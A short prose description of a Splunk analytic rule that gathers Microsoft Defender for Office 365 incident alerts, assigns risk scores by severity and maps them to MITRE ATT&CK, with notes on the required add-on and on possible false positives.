The Microsoft Defender Incident Alerts analytic rule is designed to aggregate and summarize alerts generated from Microsoft Defender for Office 365 incidents. It extracts various key pieces of information from these alerts including destination, file name, severity, command line details, IP address, registry keys, and timestamps. The rule operates by filtering out alerts marked as clean and utilizes a predefined mapping to assign risk scores based on the severity of the alerts. Additionally, the analytic dynamically links to the MITRE ATT&CK framework to enhance threat context in reports. It primarily serves as part of a risk-based alerting system, helping security teams cross-reference defined alerts against ongoing and historical threat data. To implement this analytic effectively, ingestion of alerts through the Splunk add-on for Microsoft Security is necessary, ensuring the appropriate sourcetype is defined for accurate data processing. Finally, known false positives can arise depending on individual Microsoft Defender configurations, mandating a tailored monitoring strategy.